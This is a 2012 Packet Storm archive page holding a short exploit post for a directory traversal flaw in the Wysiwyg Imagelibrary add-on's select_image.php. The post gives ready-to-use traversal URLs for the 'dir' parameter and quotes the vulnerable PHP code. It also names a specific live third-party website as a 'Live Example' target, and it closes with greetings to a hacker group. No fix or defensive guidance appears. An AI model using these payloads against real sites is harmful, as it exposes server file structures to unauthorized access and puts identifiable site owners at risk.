exploit the possibilities

Wysiwyg Imagelibrary Traversal

Wysiwyg Imagelibrary Traversal
Posted Oct 25, 2012
Authored by Geek

The Wysiwyg Imagelibrary add-on suffers from a directory traversal vulnerability in select_image.php.

tags | exploit, php, file inclusion
MD5 | 77e249e354232f6febc37ff6423d775a

Wysiwyg Imagelibrary Traversal

Change Mirror Download


# Author : Geek
# Title : Wysiwyg Imagelibrary Addons (Folders Traversal)
# Date : Today :P
# Site : Sec4ever.com

# p0x :

{x} http://localhost/lol/wysiwyg/addons/imagelibrary/select_image.php?dir=full path to public_html or httpdocs
{x} http://localhost/lol/wysiwyg/addons/imagelibrary/select_image.php?dir=..%2Fhome..%2Fuser..%2Fpublic_html

# Code :

$get_dir = isset($_GET['dir']) ? prepare_input($_GET['dir']) : "";

......

if($get_dir){
$dir = base64_decode($get_dir);

if(substr($dir, -1, 1)!='/') {
$dir = $dir . '/';
}
$dirok = true;
$dirnames = split('/', $dir);
for($di=0; $di<sizeof($dirnames); $di++) {
if($di<(sizeof($dirnames)-2)) {
$dotdotdir = $dotdotdir . $dirnames[$di] . '/';
}
}
if(substr($dir, 0, 1)=='/') {
$dirok = false;
}

if($dir == $leadon) {
$dirok = false;
}

if($dirok) {
$leadon = $dir;
}
}

$opendir = $leadon;
if(!$leadon) $opendir = '.';
if(!file_exists($opendir)) {
$opendir = '.';
$leadon = $startdir;
}


# Live Example :

{X} http://www.tourismhalong.com/includes/wysiwyg/addons/imagelibrary/select_image.php?dir=%2Fhome%2Ftouris8%2Fpublic_html

# Greet'z : b0x,Sec4ever,paulzz,The Sword,The Injector,B07 M4ST3R,Jago :P,LinuxAC,Cmos-CLR :P <3 And All Sec4ever VIP Members And Others :)


Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

September 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    1 Files
  • 2
    Sep 2nd
    38 Files
  • 3
    Sep 3rd
    30 Files
  • 4
    Sep 4th
    15 Files
  • 5
    Sep 5th
    12 Files
  • 6
    Sep 6th
    17 Files
  • 7
    Sep 7th
    3 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    24 Files
  • 10
    Sep 10th
    22 Files
  • 11
    Sep 11th
    22 Files
  • 12
    Sep 12th
    15 Files
  • 13
    Sep 13th
    5 Files
  • 14
    Sep 14th
    2 Files
  • 15
    Sep 15th
    1 Files
  • 16
    Sep 16th
    10 Files
  • 17
    Sep 17th
    0 Files
  • 18
    Sep 18th
    0 Files
  • 19
    Sep 19th
    0 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close